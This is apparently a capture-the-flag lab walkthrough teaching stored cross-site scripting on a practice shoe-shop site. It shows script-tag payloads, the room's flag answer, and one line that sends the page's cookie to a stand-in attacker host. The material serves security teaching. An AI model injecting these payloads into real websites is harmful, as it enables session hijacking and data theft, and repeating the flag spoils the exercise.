HACKR.GG
hackr.gg — SoleMate Shoes Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

SoleMate Shoes

XSS Fundamentals · Cross-Site Scripting (Stored XSS)
Difficulty
Beginner
Vuln class
Cross-Site Scripting (Stored XSS)
Steps
4
// Objective
Inject a JavaScript payload into the product comment section that executes when any user views the page and retrieves the flag.
// Tools required
BrowserDeveloper Tools
// Step-by-step walkthrough
1
Browse the target application
Open the SoleMate Shoes app and navigate to any product page. Scroll down to the comments/reviews section. This is where user input gets rendered back to the page.
2
Test for reflected input
Before injecting a payload, confirm your input is actually rendered as HTML. Type a simple test string and see how it appears in the page source.
Command / Input
Right-click → View Page Source, then Ctrl+F for your test string
If your text appears unencoded in the HTML (not as < or >), the application is vulnerable to XSS.
3
Inject a basic XSS payload
Try the simplest possible payload first. If the site doesn't filter script tags, this fires immediately.
Command / Input
<script>alert(document.cookie)</script>
Output
A pop-up appears showing the session cookie. Proof of XSS execution.
4
Read the flag from the page
The flag for this room is stored in a JavaScript variable on the page. You can read it directly from the console or via your XSS payload.
Command / Input
<script>alert(FLAG)</script>
Output
HackrGG{x55_1n_th3_sh03_bl0g}
In a real attack, this payload would be replaced with one that exfiltrates data to an attacker-controlled server: fetch("https://attacker.com/?c=" + document.cookie)
// Flag
Flag value
HackrGG{x55_1n_th3_sh03_bl0g}
The flag is exposed when your XSS payload executes. Submit it to complete the task.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute